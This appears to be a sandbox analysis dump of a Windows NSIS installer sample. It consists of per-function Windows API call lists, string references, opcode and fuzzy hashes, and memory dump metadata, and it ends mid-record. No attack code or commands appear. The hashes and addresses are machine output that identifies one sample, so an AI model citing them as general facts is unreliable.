                                                                                                                                                                                    • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                                                                                                                    • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                                                                                                                                                    • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                                                                                                                                                                      • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                                                                                                                      • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                                                                                                                                                                    • wsprintfA.USER32 ref: 0040621C
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                                                                                                                                                                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406305
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                                                                                                                                                                      • Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
                                                                                                                                                                                      • Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                    • API String ID: 2171350718-461813615
                                                                                                                                                                                    • Opcode ID: 67e7abcb15a3b792ff514517dbaa51231beb97817eaf9b334bdc8e12bec0558b
                                                                                                                                                                                    • Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 67e7abcb15a3b792ff514517dbaa51231beb97817eaf9b334bdc8e12bec0558b
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B2E
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,004326A0), ref: 00404B3A
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                                                                                                                                                                      • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                                                                                                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                                                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                                                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,0043F000,74DF3420,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                                                                                                                      • Part of subcall function 00406805: CharPrevW.USER32(?,?,74DF3420,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                                                                                                                                                                      • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                                                                                                                      • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                                                                                                                                                                      • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                    • API String ID: 2624150263-3554254475
                                                                                                                                                                                    • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                                                                                                                    • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                                                                                                                                                                    • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                                                                                                                    • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403093
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400), ref: 004030AF
                                                                                                                                                                                      • Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
                                                                                                                                                                                      • Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003), ref: 004030FB
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00403231
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Null, xrefs: 00403179
                                                                                                                                                                                    • Error launching installer, xrefs: 004030D2
                                                                                                                                                                                    • Inst, xrefs: 00403167
                                                                                                                                                                                    • soft, xrefs: 00403170
                                                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                    • API String ID: 2803837635-527102705
                                                                                                                                                                                    • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                                                                                                                    • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(004326A0,00000400), ref: 004066B6
                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 004066CC
                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,004326A0), ref: 0040672A
                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                                                                                                                                                                    • lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 0040675E
                                                                                                                                                                                    • lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 004067B8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758
                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                    • API String ID: 4024019347-730719616
                                                                                                                                                                                    • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                                                                                                                    • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                                                                    • String ID: *B$ A$ A$... %d%%
                                                                                                                                                                                    • API String ID: 551687249-3485722521
                                                                                                                                                                                    • Opcode ID: 6d935c58c9c1f66a15f185bc6e4e505f3dabe6c18ce33db7fed369594a7e0453
                                                                                                                                                                                    • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d935c58c9c1f66a15f185bc6e4e505f3dabe6c18ce33db7fed369594a7e0453
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00404598
                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 004045B0
                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 004045C3
                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004045D3
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004045ED
                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                    • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                                    • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                                                                                                                                      • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                    • String ID: 9
                                                                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                                                                    • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                                                                                                                    • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                                                                                                                    • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                                    • lstrlenW.KERNEL32(0040341D,0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                                    • lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,?,74DF23A0), ref: 00405637
                                                                                                                                                                                    • SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                                                                    • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                                                                                                                    • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                                                                                                                                                                    • GetMessagePos.USER32 ref: 00404EB4
                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404ECE
                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                    • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                                    • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                                    • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                                                                                                                                    • MulDiv.KERNEL32(?,00000064,?), ref: 00402FE1
                                                                                                                                                                                    • wsprintfW.USER32 ref: 00402FF1
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • verifying installer: %d%%, xrefs: 00402FEB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                                                    • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                                                                                                                    • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                                                                    • Opcode ID: 12069ca59edc5e45febacc53791406d74f20a71b16248a4462b159327f362224
                                                                                                                                                                                    • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 12069ca59edc5e45febacc53791406d74f20a71b16248a4462b159327f362224
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                                                                                                                    • CharNextW.USER32(?,0043F000,74DF3420,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                                                                                                                    • CharPrevW.USER32(?,?,74DF3420,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
